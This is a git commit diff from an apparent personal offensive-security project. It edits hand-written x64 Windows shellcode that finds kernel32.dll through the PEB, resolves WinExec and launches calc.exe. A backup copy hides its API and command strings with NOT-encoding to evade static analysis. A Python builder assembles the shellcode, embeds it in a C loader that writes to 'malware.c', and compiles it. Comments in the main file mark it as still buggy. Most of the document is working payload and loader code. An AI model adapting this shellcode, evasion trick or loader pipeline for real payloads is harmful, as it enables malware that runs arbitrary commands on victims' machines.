debugging

Print3M · Print3M · commit 7a2b0359a913 · 2024-07-22T23:36:42.000+02:00
diff --git a/shellcode.asm b/shellcode.asm
@@ -1,7 +1,10 @@
 [bits 64]
 
 ;; TODO: DEBUG this shiiiit (x64dbg)
+section .text:
+    global _start
 
+_start:
 ; Access PEB structure
 xor rbx, rbx
 mov rbx, gs:[0x60]      ; RBX = address of PEB struct
@@ -18,36 +21,37 @@ mov rbx, [rbx+0x20]     ; RBX = PEB_LDR_DATA.DllBase (address of kernel32.dll)
 mov r8, rbx             ; R8  = RBX (address of kernel32.dll)
 
 ; Get VA address of ExportTable (kernel32.dll)
-mov ebx, [rbx+0x3c]     ; RBX = IMAGE_DOS_HEADER.e_lfanew (PE hdrs offset)
-add rbx, r8             ; RBX = &kernel32.dll + PeHeaders offset = &PeHeaders
+mov ebx, [r8+0x3c]      ; RBX = kernel32.IMAGE_DOS_HEADER.e_lfanew (PE hdrs offset)
+add rbx, r8             ; RBX = PeHeaders offset + &kernel32.dll = &PeHeaders
 
 xor rcx, rcx
-add cx, 0x88            ; RCX = 0x88 (offset of ExportTable RVA)
-add rbx, [rbx+rcx]      ; RBX = &PeHeaders + offset of ExportTable RVA = ExportTable RVA
+add cl, 0x0088          ; RCX = 0x88 (offset ExportTable RVA)
+mov ebx, [rbx+rcx]      ; RBX = &PeHeaders + offset ExportTable RVA = ExportTable RVA
 add rbx, r8             ; RBX = ExportTable RVA + &kernel32.dll = &ExportTable
 mov r9, rbx             ; R9  = &ExportTable
 
 ; Get VA address of ExportTable.AddressOfFunctions
 xor r10, r10
-mov r10, [r9+0x1c]      ; R10 = ExportTable.AddressOfFunctions RVA
+mov r10d, [r9+0x1c]      ; R10 = ExportTable.AddressOfFunctions RVA
 add r10, r8             ; R10 = &kernel32.dll + RVA = &AddressOfFunctions
 
 ; Get VA address of ExportTable.AddressOfNames
 xor r11, r11
-mov r11, [r9+0x20]      ; R11 = ExportTable.AddressOfNames RVA
+mov r11d, [r9+0x20]      ; R11 = ExportTable.AddressOfNames RVA
 add r11, r8             ; R11 = &kernel32.dll + RVA = &AddressOfNames
 
 ; Get VA address of ExportTable.AddressOfNameOrdinals
 xor r12, r12
-mov r12, [r9+0x24]      ; R12 = ExportTable.AddressOfNameOrdinals RVA
+mov r12d, [r9+0x24]      ; R12 = ExportTable.AddressOfNameOrdinals RVA
 add r12, r8             ; R12 = &kernel32.dll + RVA = &AddressOfNameOrdinals
 
 ; Get address of WinExec function exported from kernel32.dll
 xor rcx, rcx
 add cl, 0x7                 ; RCX = function name length ("WinExec" == 7)
 
 xor rax, rax
-mov rax, 0x636578456E695700 ; RAX = function name = "cexEniW" (WinExec) + 0x00
+push ax                     ; STACK + null terminator (2)
+mov rax, 0x00636578456E6957 ; RAX = function name = "cexEniW" (WinExec) + 0x00
 push rax                    ; STACK + function name address (8)
 mov rsi, rsp                ; RSI = &function_name
 
@@ -64,8 +68,8 @@ xor rax, rax
 xor rcx, rcx
 xor rdx, rdx
 
-mov rax, 0x6578652e636c6163 ; RAX = "exe.clac" (command string: calc.exe)
 push ax                     ; STACK + null terminator (2)
+mov rax, 0x6578652e636c6163 ; RAX = "exe.clac" (command string: calc.exe)
 push rax                    ; STACK + command string (8)
 mov rcx, rsp                ; RCX = LPCSTR lpCmdLine
 
@@ -100,10 +104,14 @@ get_winapi_func:
         mov edi, [r11+rax*4]    ; RDI = function name RVA 
         add rdi, r8             ; RDI = &FunctionName = function name RVA + &kernel32.dll
         repe cmpsb              ; Compare byte at *RDI (array item str) and *RSI (param function name)
+        ; FIXME: Item NOT FOUND: RDI, RSI
+        ; Something's wrong with stack placing of the function name string.
+        ; Why is there  "shr rax, 0x8" originally? WTF?
+        ; R11 = correct
 
         je resolve_func_addr    ; Jump if exported function name == param function name
 
-        inc rax                 ; RAX = RAX + 1
+        inc rax                 ; RAX = counter + 1
         jmp short loop
 
     resolve_func_addr:
diff --git a/shellcode.asm.bak b/shellcode.asm.bak
@@ -1,92 +1,98 @@
-xor rdi, rdi            ; RDI = 0x0
-mul rdi                 ; RAX&RDX =0x0
-mov rbx, gs:[rax+0x60]  ; RBX = Address_of_PEB
-mov rbx, [rbx+0x18]     ; RBX = Address_of_LDR
-mov rbx, [rbx+0x20]     ; RBX = 1st entry in InitOrderModuleList / ntdll.dll
-mov rbx, [rbx]          ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll
-mov rbx, [rbx]          ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll
-mov rbx, [rbx+0x20]     ; RBX = &kernel32.dll ( Base Address of kernel32.dll)
-mov r8, rbx             ; RBX & R8 = &kernel32.dll
-
-; Get kernel32.dll ExportTable Address
-mov ebx, [rbx+0x3C]     ; RBX = Offset NewEXEHeader
-add rbx, r8             ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader
-xor rcx, rcx            ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
-add cx, 0x88ff
-shr rcx, 0x8            ; RCX = 0x88ff --> 0x88
-mov edx, [rbx+rcx]      ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
-add rdx, r8             ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable
-
-; Get &AddressTable from Kernel32.dll ExportTable
-xor r10, r10
-mov r10d, [rdx+0x1C]    ; RDI = RVA AddressTable
-add r10, r8             ; R10 = &AddressTable
-
-; Get &NamePointerTable from Kernel32.dll ExportTable
-xor r11, r11
-mov r11d, [rdx+0x20]    ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable
-add r11, r8             ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable)
-
-; Get &OrdinalTable from Kernel32.dll ExportTable
-xor r12, r12
-mov r12d, [rdx+0x24]    ; R12 = RVA  OrdinalTable
-add r12, r8             ; R12 = &OrdinalTable
-
-jmp short apis
-
-; Get the address of the API from the Kernel32.dll ExportTable
-getapiaddr:
-pop rbx                 ; save the return address for ret 2 caller after API address is found
-pop rcx                 ; Get the string length counter from stack
-xor rax, rax            ; Setup Counter for resolving the API Address after finding the name string
-mov rdx, rsp            ; RDX = Address of API Name String to match on the Stack 
-push rcx                ; push the string length counter to stack
-loop:
-mov rcx, [rsp]          ; reset the string length counter from the stack
-xor rdi,rdi             ; Clear RDI for setting up string name retrieval
-mov edi, [r11+rax*4]    ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
-add rdi, r8             ; RDI = &NameString    = RVA NameString + &kernel32.dll
-mov rsi, rdx            ; RSI = Address of API Name String to match on the Stack  (reset to start of string)
-repe cmpsb              ; Compare strings at RDI & RSI
-je resolveaddr          ; If match then we found the API string. Now we need to find the Address of the API 
-incloop:
-inc rax
-jmp short loop
-
-; Find the address of GetProcAddress by using the last value of the Counter
-resolveaddr:
-pop rcx                 ; remove string length counter from top of stack
-mov ax, [r12+rax*2]     ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.<API>
-mov eax, [r10+rax*4]    ; RAX = RVA API = [&AddressTable + API OrdinalNumber]
-add rax, r8             ; RAX = Kernel32.<API> = RVA kernel32.<API> + kernel32.dll BaseAddress
-push rbx                ; place the return address from the api string call back on the top of the stack
-ret                     ; return to API caller
-
-apis:                   ; API Names to resolve addresses
-; WinExec | String length : 7
-xor rcx, rcx
-add cl, 0x7                 ; String length for compare string
-mov rax, 0x9C9A87BA9196A80F ; not 0x9C9A87BA9196A80F = 0xF0,WinExec 
-not rax ;mov rax, 0x636578456e6957F0 ; cexEniW,0xF0 : 636578456e6957F0 - Did Not to avoid WinExec returning from strings static analysis
-shr rax, 0x8                ; xEcoll,0xFFFF --> 0x0000,xEcoll
-push rax
-push rcx                    ; push the string length counter to stack
-call getapiaddr             ; Get the address of the API from Kernel32.dll ExportTable
-mov r14, rax                ; R14 = Kernel32.WinExec Address
-
-; UINT WinExec(
-;   LPCSTR lpCmdLine,    => RCX = "calc.exe",0x0
-;   UINT   uCmdShow      => RDX = 0x1 = SW_SHOWNORMAL
-; );
-xor rcx, rcx
-mul rcx                     ; RAX & RDX & RCX = 0x0
-; calc.exe | String length : 8
-push rax                    ; Null terminate string on stack
-mov rax, 0x9A879AD19C939E9C ; not 0x9A879AD19C939E9C = "calc.exe"
-not rax
-;mov rax, 0x6578652e636c6163 ; exe.clac : 6578652e636c6163
-push rax                    ; RSP = "calc.exe",0x0
-mov rcx, rsp                ; RCX = "calc.exe",0x0
-inc rdx                     ; RDX = 0x1 = SW_SHOWNORMAL
-sub rsp, 0x20               ; WinExec clobbers first 0x20 bytes of stack (Overwrites our command string when proxied to CreatProcessA)
+[bits 64]
+
+section .text:
+    global _start
+
+_start:
+xor rdi, rdi            ; RDI = 0x0
+mul rdi                 ; RAX&RDX =0x0
+mov rbx, gs:[rax+0x60]  ; RBX = Address_of_PEB
+mov rbx, [rbx+0x18]     ; RBX = Address_of_LDR
+mov rbx, [rbx+0x20]     ; RBX = 1st entry in InitOrderModuleList / ntdll.dll
+mov rbx, [rbx]          ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll
+mov rbx, [rbx]          ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll
+mov rbx, [rbx+0x20]     ; RBX = &kernel32.dll ( Base Address of kernel32.dll)
+mov r8, rbx             ; RBX & R8 = &kernel32.dll
+
+; Get kernel32.dll ExportTable Address
+mov ebx, [rbx+0x3C]     ; RBX = Offset NewEXEHeader
+add rbx, r8             ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader
+xor rcx, rcx            ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
+add cx, 0x88ff
+shr rcx, 0x8            ; RCX = 0x88ff --> 0x88
+mov edx, [rbx+rcx]      ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
+add rdx, r8             ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable
+
+; Get &AddressTable from Kernel32.dll ExportTable
+xor r10, r10
+mov r10d, [rdx+0x1C]    ; RDI = RVA AddressTable
+add r10, r8             ; R10 = &AddressTable
+
+; Get &NamePointerTable from Kernel32.dll ExportTable
+xor r11, r11
+mov r11d, [rdx+0x20]    ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable
+add r11, r8             ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable)
+
+; Get &OrdinalTable from Kernel32.dll ExportTable
+xor r12, r12
+mov r12d, [rdx+0x24]    ; R12 = RVA  OrdinalTable
+add r12, r8             ; R12 = &OrdinalTable
+
+jmp short apis
+
+; Get the address of the API from the Kernel32.dll ExportTable
+getapiaddr:
+pop rbx                 ; save the return address for ret 2 caller after API address is found
+pop rcx                 ; Get the string length counter from stack
+xor rax, rax            ; Setup Counter for resolving the API Address after finding the name string
+mov rdx, rsp            ; RDX = Address of API Name String to match on the Stack 
+push rcx                ; push the string length counter to stack
+loop:
+mov rcx, [rsp]          ; reset the string length counter from the stack
+xor rdi,rdi             ; Clear RDI for setting up string name retrieval
+mov edi, [r11+rax*4]    ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
+add rdi, r8             ; RDI = &NameString    = RVA NameString + &kernel32.dll
+mov rsi, rdx            ; RSI = Address of API Name String to match on the Stack  (reset to start of string)
+repe cmpsb              ; Compare strings at RDI & RSI
+je resolveaddr          ; If match then we found the API string. Now we need to find the Address of the API 
+incloop:
+inc rax
+jmp short loop
+
+; Find the address of GetProcAddress by using the last value of the Counter
+resolveaddr:
+pop rcx                 ; remove string length counter from top of stack
+mov ax, [r12+rax*2]     ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.<API>
+mov eax, [r10+rax*4]    ; RAX = RVA API = [&AddressTable + API OrdinalNumber]
+add rax, r8             ; RAX = Kernel32.<API> = RVA kernel32.<API> + kernel32.dll BaseAddress
+push rbx                ; place the return address from the api string call back on the top of the stack
+ret                     ; return to API caller
+
+apis:                   ; API Names to resolve addresses
+; WinExec | String length : 7
+xor rcx, rcx
+add cl, 0x7                 ; String length for compare string
+mov rax, 0x9C9A87BA9196A80F ; not 0x9C9A87BA9196A80F = 0xF0,WinExec 
+not rax ;mov rax, 0x636578456e6957F0 ; cexEniW,0xF0 : 636578456e6957F0 - Did Not to avoid WinExec returning from strings static analysis
+shr rax, 0x8                ; xEcoll,0xFFFF --> 0x0000,xEcoll
+push rax
+push rcx                    ; push the string length counter to stack
+call getapiaddr             ; Get the address of the API from Kernel32.dll ExportTable
+mov r14, rax                ; R14 = Kernel32.WinExec Address
+
+; UINT WinExec(
+;   LPCSTR lpCmdLine,    => RCX = "calc.exe",0x0
+;   UINT   uCmdShow      => RDX = 0x1 = SW_SHOWNORMAL
+; );
+xor rcx, rcx
+mul rcx                     ; RAX & RDX & RCX = 0x0
+; calc.exe | String length : 8
+push rax                    ; Null terminate string on stack
+mov rax, 0x9A879AD19C939E9C ; not 0x9A879AD19C939E9C = "calc.exe"
+not rax
+;mov rax, 0x6578652e636c6163 ; exe.clac : 6578652e636c6163
+push rax                    ; RSP = "calc.exe",0x0
+mov rcx, rsp                ; RCX = "calc.exe",0x0
+inc rdx                     ; RDX = 0x1 = SW_SHOWNORMAL
+sub rsp, 0x20               ; WinExec clobbers first 0x20 bytes of stack (Overwrites our command string when proxied to CreatProcessA)
 call r14                    ; Call WinExec("calc.exe", SW_HIDE)
diff --git a/shellcoder.py b/shellcoder.py
@@ -16,11 +16,6 @@
 #   - NASM (Netwide Assembler)
 #   - Visual Studio 2022
 
-"""
-[ ] Sprawdz czy zwykly shellcode dziala
-[ ] Moze NASM trzeba jakos inaczej kompilowac / pobierac?
-"""
-
 import subprocess
 import os
 import sys
@@ -30,7 +25,7 @@
 
 # Utility files
 SHELLCODE_INPUT_FILE = "shellcode.asm"
-SHELLCODE_OUTPUT_FILE = f"{OUT_DIR}\\shellcode.bin"
+SHELLCODE_OUTPUT_NAME = f"{OUT_DIR}\\shellcode"
 LOADER_INPUT_FILE = "loader.c"
 LOADER_OUTPUT_FILE = f"{OUT_DIR}\\malware.c"
 
@@ -43,10 +38,30 @@
 # Batch script with Visual Studio compiler environment variables
 MSVC_BATCH_SCRIPT = "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Auxiliary\\Build\\vcvars64.bat"
 
+global ENVIRON 
+
+
+def get_msvc_console_environs() -> dict[str, str]:
+    cmd = f'"{MSVC_BATCH_SCRIPT}" && set'
+    executable = "C:\\Windows\\System32\\cmd.exe"
+    process = subprocess.run(cmd, text=True, check=True, capture_output=True, shell=True, executable=executable)
+
+    if process.returncode != 0:
+        print(f"[!] MSVC Developer Console error: {process.stderr}")
+        sys.exit(-1)
+
+    envs = {}
+    for line in process.stdout.splitlines():
+        if '=' in line:
+            key, value = line.split('=', 1)
+            envs[key] = value
+            
+    return envs
+  
 
 def is_cmd_available(cmd: str):
     try:
-        subprocess.call(cmd, text=True)
+        subprocess.call(cmd, text=True, stderr=subprocess.PIPE)
     except FileNotFoundError:
         return False
     
@@ -57,27 +72,35 @@ def assert_cmd(cmd: str):
     if (is_cmd_available(cmd)):
         return 
 
-    print(f"[!] command not found: {cmd}", file=sys.stderr)    
+    print(f"[!] Command not found: {cmd}", file=sys.stderr)    
     sys.exit(-1)
 
+def cmd_exec(cmd: str):
+    subprocess.run(cmd, text=True, check=True, shell=True, env=ENVIRON)
 
 if __name__ == "__main__":
     # Check if NASM is available
     assert_cmd("nasm")
+    print("[*] Fetching VS Developer Console envs...")
+    ENVIRON = get_msvc_console_environs()
 
     # Prepare output directory
     os.makedirs(OUT_DIR, exist_ok=True)
 
-    # Compile Assembly
-    subprocess.run(
-        ["nasm", "-f", "bin", SHELLCODE_INPUT_FILE, "-o", SHELLCODE_OUTPUT_FILE], check=True
-    )
+    # Compile Assembly (exe)
+    SHELLCODE_OBJ_OUTPUT = f"{SHELLCODE_OUTPUT_NAME}.obj"
+    cmd_exec(f"nasm -f win64 {SHELLCODE_INPUT_FILE} -o {SHELLCODE_OBJ_OUTPUT}")
+    print(f"[+] NASM: {SHELLCODE_INPUT_FILE} -> {SHELLCODE_OUTPUT_NAME}.exe")
+    cmd_exec(f'cd "{OUT_DIR}" && link "..\\{SHELLCODE_OBJ_OUTPUT}" /out:shellcode.exe /entry:_start /subsystem:console')
 
-    print(f"[+] NASM: {SHELLCODE_INPUT_FILE} -> {SHELLCODE_OUTPUT_FILE}")
+    # Compile Assembly (bin)
+    SHELLCODE_BIN_OUTPUT = f"{SHELLCODE_OUTPUT_NAME}.bin"
+    cmd_exec(f"nasm -f bin {SHELLCODE_INPUT_FILE} -o {SHELLCODE_BIN_OUTPUT}")
+    print(f"[+] NASM: {SHELLCODE_INPUT_FILE} -> {SHELLCODE_BIN_OUTPUT}")
 
     # Prepare C array with shellcode payload
     payload = ""
-    with open(SHELLCODE_OUTPUT_FILE, "rb") as f:
+    with open(SHELLCODE_BIN_OUTPUT, "rb") as f:
         bytes = bytearray(f.read())
 
     size = len(bytes)
@@ -100,8 +123,5 @@ def assert_cmd(cmd: str):
 
     # Compile final binary
     print(f"[*] MSVC: Compilation of {LOADER_OUTPUT_FILE} \n")
-
-    cmd = f'"{MSVC_BATCH_SCRIPT}" && cd "{OUT_DIR}" && cl.exe "../{LOADER_OUTPUT_FILE}"'
-    proc = subprocess.run(cmd, check=True, text=True)
-
+    cmd_exec(f'cd "{OUT_DIR}" && cl.exe "../{LOADER_OUTPUT_FILE}"')
     print(f"\n[+] Output binary ({BINARY_OUTPUT_FILE}) is ready to be executed!")
